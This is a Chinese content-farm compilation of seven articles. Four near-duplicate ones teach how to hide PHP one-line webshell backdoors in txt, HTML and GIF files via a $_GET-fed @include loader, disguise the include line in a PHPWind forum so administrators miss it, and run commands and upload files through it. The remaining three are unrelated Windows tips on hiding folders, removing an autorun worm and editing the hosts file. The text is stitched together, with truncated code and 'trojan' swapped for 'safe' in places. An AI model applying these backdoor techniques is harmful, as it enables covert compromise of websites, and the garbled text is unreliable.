“天真的和感伤的”通过精心收集,向本站投稿了7篇教你巧妙隐藏PHP文件后门,下面是小编整理后的教你巧妙隐藏PHP文件后门,欢迎大家阅读借鉴,并有积极分享。
- 目录
篇1:教你巧妙隐藏PHP文件后门
最近很多朋友都在问我是否能把我那一句话安全隐藏到HTML或图片里,其实把一句话安全插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看的这篇测试报告吧,
要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把安全隐藏到图片的文章吧。也就是在PHP文件里用include(“x.gif”)这样的语句来调用隐藏在图片的安全语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入安全的性能得不到发挥。
Include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的,
由此我们就可以构造类似的语句来插入到PHP文件中。然后把安全隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:
<‘’?@include includ/.$PHPWIND_ROOT;? >[Copy to clipboard]
一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP安全隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
CODE:$test=
篇2: 教你隐藏PHP文件后门
后门的隐藏很重要,本篇教你安全隐藏php一句话文件后门的技巧,
教你隐藏PHP文件后门
。
要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把安全隐藏到图片的文章吧。也就是在PHP文件里用include(“x.gif”)这样的语句来调用隐藏在图片的安全语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入安全的性能得不到发挥。
Include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的,
由此我们就可以构造类似的语句来插入到PHP文件中。然后把安全隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:
<‘’?@include includ/.$PHPWIND_ROOT;? >[Copy to clipboard]
一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP安全隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
CODE:$test=
篇3:教你 隐藏PHP文件后门的技巧
最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看的这篇测试报告吧,
要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include(“x.gif”)这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
Include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:
CODE:
<‘’?@include includ/.$PHPWIND_ROOT;? >[Copy to clipboard]
一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试,
首先建立一PHP文件test.php 文件内容为:
CODE:$test=$_GET['test'];
@include 'test/'.$test;
?>
[Copy to clipboard]
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 hxxp://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 hxxp://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如: 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 C:\\Uniserver2_7s\\www\\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把插入到图片末尾
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入
我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
篇4: 口述―关于Php后门的隐藏技巧测试
最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试报告吧,
口述―关于Php后门的隐藏技巧测试
。要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include(“x.gif”)这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? >一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了,
随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如: 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。我可以得到目录为 C:\\Uniserver2_7s\\www\\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把插入到图片末尾
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入
我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令,我们执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。
篇5:巧妙隐藏需要保密文件的两招
硬盘中总有一些文件并不想随意让其他人查看,使用一些专业的加密类工具软件当然可以实现隐藏文件的效果,但这必须要安装上第三方加密工具,好像有点小题大做,其实,利用好WinXP系统自身的功能,我们就能赤手空拳隐藏文件。
第一招:命令法
Step1:按“Win+R”组合键打开“运行”对话框,输入“cmd”打开命令提示符窗口。然后输入“md g:jm..”并按回车键,在G盘(根据你的实际情况输入相应的目录)下新建一个名为“jm.”的文件夹。这个文件夹就是我们即将用来存放隐藏文件的文件夹。
Step2:再次进入“运行”对话框,输入上面新建的加密文件夹“g:jm..”,敲击回车键后这个文件夹便被打开了。接下来,只要将你想要隐藏的文件放到此文件夹中即可完成文件的隐藏了。
现在,包括你自己在内的任何一个人都无法直接通过鼠标双击这个文件夹来将其打开,双击后只会得到一个错误的提示框。当自己想要将文件夹打开的时候,可以通过在“运行”对话框中输入这个文件夹的路径来将其打开。如果你想删除此文件夹,只要将其中的内容全部删除,再回到命令提示符窗口中运行“rd g:jm..”即可。
第二招:寄生法
如果你有一份重要的文件需要隐藏起来,将其伪装成一首双击即可播放的歌曲,绕开别人的视线和怀疑,岂不妙!
Step1:新建一个文件夹,将需要隐藏的文件拷贝至此文件夹中,
接下来再找首歌曲文件(例如“吉祥三宝”)并将其拷贝到此文件夹中。
Step2:在资源管理器中重新定位到上面这个存放了隐藏文件的文件夹,按“F2”键为之重新命名,命名的规则为:歌曲名称+.{00020c01-0000-0000-c000-000000000046},例如“吉祥三宝.{00020c01-0000-0000-c000-000000000046}”。右击鼠标刷新一下当前屏幕,刚才的文件夹便自动变成一首歌曲的图标了,直接双击之也会自动启动播放器来播放它。而当你自己想要打开其中的文件时,只要右击这个歌曲图标并选择“打开”命令即可。
最后,再将这个改名后的文件夹(已经变成了一首歌曲)放到歌曲文件夹中,谁也不太可能会找到你想隐藏的文件了,不过你自己可要记清楚了,防止时间长了,连自己也忘记了。
提示:上面的这一串数字及符号需要在英文输入法下进行输入,否则无法成功。
热门推荐:自己动手打造一道超级电脑防火墙修改Win XP让系统不再越用越慢
点击阅读更多学院相关文章>>
分享到
篇6:打开隐藏文件的方法,教你如何打来隐藏文件
1、断开网络连接
2、打开“任务管理器”,应该有个SVOHOST.EXE进程,把它结束掉,到C:\WINDOWS\system32里找到SVOHOST.EXE把它删除。(注:系统进程是 svchost.exe,第三个字母是c不是o)
3、执行“开始”-“运行”-输入“regedit”打开注册表
4、找到HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL中的CheckedValue,检查它的类型是否为REG_DWORD,如果不是则删掉CheckedValue,然后单击右键“新建”--〉“Dword值”,并命名为CheckedValue,然后修改它的键值为1,
(不做这一步,第6、7步将无法查看到隐藏的系统文件)
5、打开各硬盘(“我的电脑”里右键“打开”或“资源管理器”右侧选择)。
6、“文件夹选项”-“查看”-选择“显示所有文件和文件夹”,并把“隐藏受保护的系统文件”复选框去除选择。
7、可以看到各个硬盘根目录下都有autorun.inf和sxs.exe文件,把它们都删掉。如果U盘上也有,也删掉。U盘上的可能删了又会出现,那就再检查一下“任务管理器”里有没有SOVHOST.EXE进程,把它结束掉。
8、这样就该差不多了。
9、如果安装的是瑞星,防火墙和杀毒软件应该可以打开了,其他杀毒软件应该也可以打开了。
10、如果瑞星计算机监控无法打开,或者打开后是收着的小红伞,并且所有的监控开启都失败,那么到“控制面板”-“管理工具”-“服务”,找到“Rising ProCESs Communication Center”,应该是被禁用了,右键“属性”,启动类型一项改为“自动”,然后启用该服务。11、至此,计算机恢复正常。
篇7:教你如何巧妙修改hosts文件 手工屏蔽恶意网站
一、什么是hosts文件
hosts文件存在于Windows目录下的system32\\drivers\\etc中,这个文件没有扩展名,但是,我们可以使用记事本来打开编辑。打开文件,可以看见其中有很多英文解释,在文件末尾,有127.0.0.1localhost这一行字。这个文件包括主机的IP地址和映像名称,输入的每一个地址都应该放在单独的行列中。IP地址应该被放在对应的主机名的第一栏中。IP地址与主机名之间应该至少有一个空格。
由于我们在访问网站时,对hosts文件的请求级别比DNS服务器高,因此修改hosts文件可以对指定的网址进行处理,达到防止用户访问特定网站的效果。
hosts文件还可以加快我们对网站的访问速度。在我们访问网络的时候,我们的计算机向DNS服务器发送一个网络域名,DNS服务器则把这个域名解析成为一个IP地址后返回给计算机。这个过程会使访问网站的速度减慢。正确地对hosts文件进行编辑可以加快对网站的访问速度。如:在hosts文件中添加指定的IP地址,使得DNS服务器不用对网页的地址进行解析。
其实,hosts文件还有其他的特殊高级功能:如方便局域网用户顺利连接系统等。这些功能可以大大减少我们对网络的访问时间,使我们对网络的访问更快捷、更方便,
二、屏蔽特定网站
要屏蔽特定网站,我们可以如下操作。
1.在C:\\windows\\system32\\drivers\\etc中,找到hosts文件,用记事本打开。
2.在文件的最下方输入你要屏蔽的几个网站的地址,格式如下假设要屏蔽的网址为my123***.com:
127.0.0.1 www.my123***.com
127.0.0.1 my123***.com
3.保存hosts文件。
4.将hosts文件的属性改为只读,防止被病毒篡改。
三、加速访问网站
要加快网址的解析速度,为我们访问网站提速,先要查找你所需要访问的网站的IP地址,可以使用ping命令。然后,打开hosts文件,在文件的末尾加上“IP地址域名”。
最后,保存hosts文件并修改为只读属性。当你再次浏览该网站时,域名―IP地址的解析工作就由你本机完成了,不需要访问DNS服务器,加快了网站访问速度。
★ ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警
★ 文件范本
★ 文件范文
教你巧妙隐藏PHP文件后门(精选7篇)




